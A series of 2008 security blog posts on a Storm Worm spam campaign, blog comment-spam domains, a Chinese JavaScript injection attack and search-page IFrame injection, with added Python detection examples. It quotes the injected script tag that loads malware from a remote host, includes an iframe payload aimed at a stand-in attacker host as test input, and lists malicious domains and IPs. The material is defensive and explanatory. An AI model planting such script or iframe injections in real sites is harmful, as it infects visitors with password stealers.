
April Fool’s Day Storm Worm Campaign

March 31st, 2008 by Steven Adair

No jokes here, just a quick update on the ever-exciting Storm Worm. Today it started an April Fool's Day campaign aimed at infecting more systems. As before, the spam points you to already-infected machines by giving you a URL to a raw IP address rather than a domain name. Right now the file names are "foolsday.exe", "funny.exe", and "kickme.exe".

[Screenshot: the full campaign website]

Nothing too fancy this time around, and it seems they're a little late in their delivery; normally they start a little earlier. Anyway, just be on the lookout and don't infect yourself accidentally.

Posted in Spam, Storm Worm

Evil Blog Comment Spam Domains

March 16th, 2008 by Steven Adair

I have written a blog post or two in the past about comment spam on this blog. However, after having more time and a larger sample, I can easily tell you about the 13 domains that are nearly the bane of my comment area's existence. All 13 belong to the same individual or group, who continually bombard my blogs with comment spam. They have been doing this for about six months now and always use different IP addresses. The following domain names are always used:

airline333tickets.com
airline379tickets.com
cialis-l-pills.com
cialis-gl-pills.com
new-music-mp3.com
payday333loans.com
payday-gl-loans.com
phentermine-gl-pills.com
phentermine-1-pills.com
viagra-77-pills.com
viagra-gl-pills.com
xanax777pills.com
xanax-gl-pills.com

What is even more interesting is that these guys also easily get past my comment spam honeypot; they have never been caught by it. The honeypot has reduced my comment spam by 80% or so, so I now receive only a couple of new spam comments a day that it doesn't catch. These, however, make it right through every time. It seems that all of the domain names involved are hosted on one of the following three IP addresses (at least right now):

72.9.109.250
72.9.109.251
72.9.109.253

These are all under a hosting provider at Ezzi.net. I have no idea whether these are legitimately paid-for boxes or compromised; I do not have evidence one way or the other. I just know it's really shady to spam so heavily from so many different IP addresses. :)

Just doing a Google search on a few of these domains, like "airline333tickets.com" and "xanax777pills.com", reveals over 65,000 search results. It would seem I am not the only one being heavily spammed by these guys. They've left hundreds of blog comment spams in my queue. Here is an example from earlier today:

—–

alumnimb | triath@Ced.com | phentermine-1-pills.com | IP: 68.185.223.151

How do you do…
Good stuff, very nicely done.
Good stuff, very nicely done!
http://viagra-77-pills.com/discount__viagra.html
http://viagra-77-pills.com/cheap–viagra.html

I simply mad about this forum!
There was merrily!

Like! Thank you!
The Author, you - super hero!
http://airline333tickets.com/allegiant_airline_tickets.html
http://cialis-l-pills.com/cialis_10_levitra.html
http://xanax777pills.com/order_10_xanax.htm

I am glad to find this forum !
Excellent forum, added to favorites!
http://phentermine-gl-pills.com/phentermine-9-online.html
http://cialis-l-pills.com/cialis_online.html

Thank you! I delighted!
Pretty nice forum, wants to see much more on it!
I Will be back!

Mar 16, 9:14 AM

—–

As we can see, our commenters make superior use of the English language and link us to a litter of exciting domains to visit. For what it's worth, all of the domains are registered with either PUBLICDOMAINREGISTRY.COM or ESTDOMAINS.
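A filter that catches this particular spammer without relying on the honeypot is straightforward, because the links are the giveaway: the comments always point at the same 13 domains, and they carry far more URLs than a real reader ever posts. The following is an added example (it is not code from this blog); it scores a comment on the domains it links to, the commenter's "website" field, an optional resolved IP for that site, and the raw link count. The link-count threshold and the function names are assumptions, and the sample comment body is reconstructed from the spam quoted above.

```python
import re
from urllib.parse import urlparse

# The 13 domains listed above, plus the three hosting IPs they resolved to.
SPAM_DOMAINS = {
    "airline333tickets.com", "airline379tickets.com",
    "cialis-l-pills.com", "cialis-gl-pills.com",
    "new-music-mp3.com",
    "payday333loans.com", "payday-gl-loans.com",
    "phentermine-gl-pills.com", "phentermine-1-pills.com",
    "viagra-77-pills.com", "viagra-gl-pills.com",
    "xanax777pills.com", "xanax-gl-pills.com",
}
SPAM_HOSTS = {"72.9.109.250", "72.9.109.251", "72.9.109.253"}

# Assumption: this threshold is ours, not the blog's; tune it for your site.
MAX_LINKS = 3

URL_RE = re.compile(r"https?://[^\s<>\"']+", re.IGNORECASE)


def normalise_host(host):
    """Lower-case a host name, drop a trailing dot and a leading 'www.'."""
    host = (host or "").lower().rstrip(".")
    return host[4:] if host.startswith("www.") else host


def hosts_in(text):
    """Return the set of host names referenced by URLs in free text."""
    return {normalise_host(urlparse(u).hostname) for u in URL_RE.findall(text)} - {""}


def score_comment(author_site, body, resolved_ip=None):
    """Classify one comment. author_site is the blog form's 'website' field;
    resolved_ip is the address that site resolves to, if the caller looked it up."""
    site = author_site.strip()
    if site and "://" not in site:
        site = "http://" + site  # the field is usually a bare domain
    hosts = hosts_in(body) | hosts_in(site)
    url_count = len(URL_RE.findall(body))
    bad_domains = sorted(hosts & SPAM_DOMAINS)
    reasons = []
    if bad_domains:
        reasons.append("known spam domain: " + ", ".join(bad_domains))
    if resolved_ip in SPAM_HOSTS:
        reasons.append("author site hosted at " + resolved_ip)
    if url_count > MAX_LINKS:
        reasons.append("%d links in body" % url_count)
    if bad_domains or resolved_ip in SPAM_HOSTS:
        verdict = "spam"
    elif url_count > MAX_LINKS:
        verdict = "suspicious"
    else:
        verdict = "ham"
    return {"verdict": verdict, "url_count": url_count,
            "spam_domains": bad_domains, "reasons": reasons}


# Constructed sample, reduced from the spam comment quoted above.
SAMPLE_SPAM = """How do you do...
Good stuff, very nicely done.
http://viagra-77-pills.com/discount__viagra.html
http://viagra-77-pills.com/cheap--viagra.html
The Author, you - super hero!
http://airline333tickets.com/allegiant_airline_tickets.html
http://cialis-l-pills.com/cialis_10_levitra.html
http://xanax777pills.com/order_10_xanax.htm
http://phentermine-gl-pills.com/phentermine-9-online.html
http://cialis-l-pills.com/cialis_online.html
Thank you! I delighted!"""

if __name__ == "__main__":
    print(score_comment("phentermine-1-pills.com", SAMPLE_SPAM))
    print(score_comment("", "Nice post, see http://example.com/blog"))
```

The domain match is done on parsed host names rather than on substrings, so a comment that merely mentions "viagra" in prose is not flagged, and the "www." prefix the spammer sometimes adds does not dodge the list.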

Posted in Spam

Chinese JavaScript Attack and Mass IFrame Injection Different

March 15th, 2008 by Steven Adair

Hello to all who find this page. I'd like to try to clear up some confusion for a few of you out there. There has been a lot of coverage over the last few days of two completely different attacks that somehow end up being linked together. We will look at both issues, describe them, and show how these attacks are not the same.

Chinese JavaScript Injection Attack

Over the past ten days or so, the following code has found its way into the actual source code of several thousand web pages:

<script src=http://www.2117966.net/fuckjp.js></script>

This JavaScript attempts to do several things and loads other files that try to exploit the visitor. With this attack there are *NO* iframe tags involved; the line above is exactly what was injected. This is almost identical to the "uc8010.com" attacks of a few months ago. In fact, we were able to find a few pages that appear to have had the line of code above injected right into the middle of where it used to refer to uc8010.com. In my opinion it looks very similar but seems to have different goals. In any event, if you get malware from the latest round of these attacks, it will be stealing the passwords you send with Internet Explorer.

An interesting side note worth mentioning is that Trend Micro's own website was hit with this attack. They had several pages, still viewable in Google's cache, that were injected with the above script. It just goes to show that this kind of unfortunate thing can happen to anyone.

IFrame Injection Attack

The other attack that is getting a lot of attention is one that's labeled an IFrame injection attack. However, in these instances the websites themselves are NOT actually hacked. Rather, the sites' search pages lack input validation and echo the search term back unescaped, so the attackers can craft searches whose terms contain an IFrame pointing at a malicious website; those result pages then get cached and indexed by search engines. In theory they could just as easily have put in a JavaScript reference; it just happens they used an IFrame in the search terms that get cached. The websites themselves have not been compromised (i.e. if you just legitimately browsed the website, you would not find yourself under attack). It appears some of the malicious sites attempt to exploit vulnerabilities in the user's system and others present fake errors about needing a video codec. From what I have seen and what has been reported, the Zlob trojan is the target install for most of this. You can read more information and see examples at http://ddanchev.blogspot.com/.
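The difference between the two attacks is easiest to see in code. The following is an added example (not code from this blog or from either attack): one scanner that pulls every script and iframe reference out of a page and flags references that are off-site or on a blocklist, which catches the injected 2117966.net line in a page's stored source; and, for the IFrame case, a toy search page in its unescaped and escaped forms, showing that the attack only works because the term is reflected verbatim. The blocklist contents, the sample page, the attacker's search term and the host names used are assumptions, constructed to mirror what the post describes.

```python
from html import escape
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hosts the post names as sources of injected script. In practice this would
# come from your own blocklist.
BLOCKLIST = {"2117966.net", "uc8010.com"}


class RefCollector(HTMLParser):
    """Collects the src of every <script> and <iframe> in a document.
    html.parser accepts unquoted attribute values, so the bare
    src=http://... form used in the injection is handled."""

    def __init__(self):
        super().__init__()
        self.refs = []

    def handle_starttag(self, tag, attrs):
        if tag in ("script", "iframe"):
            src = dict(attrs).get("src")
            if src:
                self.refs.append((tag, src.strip()))


def host_of(url):
    """Lower-cased host of a URL without a leading 'www.'; '' for relative paths."""
    host = (urlparse(url).hostname or "").lower()
    return host[4:] if host.startswith("www.") else host


def find_injected_refs(html_doc, page_host):
    """Return (tag, src, reason) for every script/iframe reference that is
    either on the blocklist or points off-site. page_host is the host the
    page was fetched from, used to tell local includes from injected ones."""
    collector = RefCollector()
    collector.feed(html_doc)
    collector.close()
    hits = []
    for tag, src in collector.refs:
        host = host_of(src)
        if not host:
            continue  # relative path: served by the site itself
        if host in BLOCKLIST or any(host.endswith("." + b) for b in BLOCKLIST):
            hits.append((tag, src, "blocklisted host"))
        elif host != page_host:
            hits.append((tag, src, "off-site reference"))
    return hits


# The IFrame case: a search page that echoes the query back to the visitor.

def search_page_vulnerable(query):
    """Reflects the search term unescaped; an iframe in the query is rendered."""
    return "<html><body><h1>Results for: %s</h1><p>No results.</p></body></html>" % query


def search_page_fixed(query):
    """Same page with the term HTML-escaped; the iframe becomes inert text."""
    return ("<html><body><h1>Results for: %s</h1><p>No results.</p></body></html>"
            % escape(query, quote=True))


# Constructed sample of an injected page, modelled on the line quoted above.
INJECTED_PAGE = (
    "<html><head><title>Victim site</title>"
    "<script src=http://www.2117966.net/fuckjp.js></script>"
    '<script src="/js/menu.js"></script></head>'
    "<body><p>Welcome.</p></body></html>"
)
# Constructed attacker search term for the reflected case (hypothetical host).
IFRAME_QUERY = '<iframe src=http://evil.invalid/codec.html width=0 height=0></iframe>'

if __name__ == "__main__":
    for hit in find_injected_refs(INJECTED_PAGE, "example.org"):
        print("injected page:", hit)
    for hit in find_injected_refs(search_page_vulnerable(IFRAME_QUERY), "example.org"):
        print("vulnerable search page:", hit)
    print("fixed search page:", find_injected_refs(search_page_fixed(IFRAME_QUERY), "example.org"))
```

Running the scanner over the vulnerable search page reports an off-site iframe even though nothing on the server was modified, which is exactly why the two attacks get confused: the symptom in the browser is the same, but only the first one leaves a change in the site's files.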

Conclusion

As you can see, these are completely unrelated attacks. Other than the fact that they both involve the Internet and getting malware onto a user's system, there is really no correlation. However, either group could easily use the other's techniques, as could any other group. We have seen some interesting tricks from the bad guys lately. We'll have to see what they come up with next.

Steven

Posted in Malware, Exploits

Mass Infection of Websites Aimed at Stealing Your Passwords!

March 14th, 2008 by Steven Adair

There has been another round of websites being attacked and having malicious JavaScript links placed into them. This causes visitors to the legitimate websites that have been hacked to attempt to load a malicious JavaScript file from a Chinese website. The website 2117966.net (125.46.105.224) should be blocked, or at least monitored for, wherever possible! Please do not visit this website. The JavaScript loads other files and attempts to exploit several vulnerabilities to compromise the end user. If a compromise is successful, a password stealer is loaded onto the system. That program attempts to send keylogged data to another server in China at the IP address 61.188.39.175.

Please be on the lookout for these websites and IPs on your network. You can read the full blog post, with links to other sites reporting this issue, at http://www.shadowserver.org/wiki/pmwiki.php?n=Calendar.20080313
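"Monitor for these on your network" in practice means sweeping proxy logs for the three indicators above. The following is an added example (not code from this blog or from Shadowserver) that matches Squid native-format access log lines against the domain and the two IPs, treating the domain as a suffix match so that www.2117966.net is caught but a host that merely contains the digits is not. The log lines are constructed for the example and are not real traffic; the log format and function names are assumptions.

```python
from urllib.parse import urlparse

# Indicators from the post: the script host, its IP, and the keylogger drop server.
INDICATOR_DOMAINS = {"2117966.net"}
INDICATOR_IPS = {"125.46.105.224", "61.188.39.175"}

# Constructed Squid native-format access.log lines (not real traffic):
# time elapsed client code/status bytes method URL ident hierarchy/peer type
SAMPLE_LOG = """\
1205500000.123    250 10.0.0.5 TCP_MISS/200 2310 GET http://www.2117966.net/fuckjp.js - DIRECT/125.46.105.224 application/javascript
1205500001.456    120 10.0.0.7 TCP_MISS/200 512 POST http://61.188.39.175/post.asp - DIRECT/61.188.39.175 text/html
1205500002.789     80 10.0.0.9 TCP_HIT/200 4096 GET http://www.example.com/index.html - NONE/- text/html
1205500003.000     90 10.0.0.11 TCP_MISS/200 100 GET http://safe12117966.net/ - DIRECT/198.51.100.4 text/html
"""


def domain_matches(host, indicator):
    """True for the indicator itself or any subdomain of it, never for a
    host that merely contains it as a substring."""
    return host == indicator or host.endswith("." + indicator)


def parse_squid_line(line):
    """Split one native-format line into the fields we need; None if malformed."""
    f = line.split()
    if len(f) < 10:
        return None
    url = f[6]
    host = (urlparse(url).hostname or "").lower()
    peer = f[8].split("/", 1)[1] if "/" in f[8] else "-"
    return {"ts": f[0], "client": f[2], "url": url, "host": host, "peer": peer}


def match_indicators(log_text):
    """Return one record per log line that touches a known-bad host or IP.
    Both the URL host and the upstream peer address are checked, so a request
    made by IP and a request made by name are caught alike."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_squid_line(line)
        if rec is None:
            continue
        matched = set()
        for d in INDICATOR_DOMAINS:
            if domain_matches(rec["host"], d):
                matched.add(d)
        for ip in INDICATOR_IPS:
            if rec["host"] == ip or rec["peer"] == ip:
                matched.add(ip)
        if matched:
            hits.append({"ts": rec["ts"], "client": rec["client"],
                         "url": rec["url"], "matched": sorted(matched)})
    return hits


if __name__ == "__main__":
    for hit in match_indicators(SAMPLE_LOG):
        print("%(ts)s %(client)s %(url)s -> %(matched)s" % hit)
```

The client address in each hit is the machine to pull for a look: a fetch of fuckjp.js means the user visited an injected page, while a POST to 61.188.39.175 means the password stealer is already installed and reporting.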

Posted in Malware, Exploits

CNN Interviews Chinese Hackers

March 8th, 2008 by Steven Adair

Apparently CNN recently interviewed some hackers from China and posted a story about it on its website. They claim to have hacked into many sensitive sites, including that of the Pentagon. The article is interesting, although it's very light on verifiable facts, as the article itself mentions. Slashdot also just had a recent posting that's closely related and even links to the article. It's all fairly interesting, but people still don't seem to understand that the machines you can reach from the Internet do not (or at least should not) have any classified information on them. This is not to say there isn't sensitive information they may have gotten, but I doubt the Chinese are going to suddenly know our battle plans or copy our technology as a result.

Posted in Random

Abdallah Internet Hizmetleri Dead?

March 4th, 2008 by Steven Adair

Well, it looks like there might be good news regarding Abdallah_Internet Hizmetleri, a group that owned a few IP ranges on TurkTelekom. It appears they might no longer be operational. As of late last night or early today, all routes to 88.255.90.0/24 and 88.255.94.0/24 appear to have gone dead. Part of the WHOIS record now reads as follows:

    person: Mahmod AbdAllah el Gashmi
    address: SISTEMNET TELEKOM BLACKLISTED PERSON
    e-mail: admin@sistemnet.com.tr
    phone: +902122666060
    remarks: ——————————————————
    remarks: SISTEMNET TELEKOM BLACKLISTED PERSON
    remarks: For Abuse Contact : abuse@sistemnet.com.tr
    remarks: SISTEMNET TELEKOM BLACKLISTED PERSON
    remarks: SISTEMNET TELEKOM BLACKLISTED PERSON
    remarks: ——————————————————

This is pretty good news, as we have previously blogged about these IP ranges here. One of my Shadowserver colleagues also recently published a whitepaper about AbdAllah Internet Hizmetleri. It would be awesome if this is what ultimately pulled the plug. You can read the whitepaper, entitled "RBN Rizing", in the whitepapers section of the Shadowserver website, or view the RBN Rizing document directly. Happy reading and good riddance (?) to AbdAllah_Internet! :D

Posted in Malware, Exploits, RBN, Random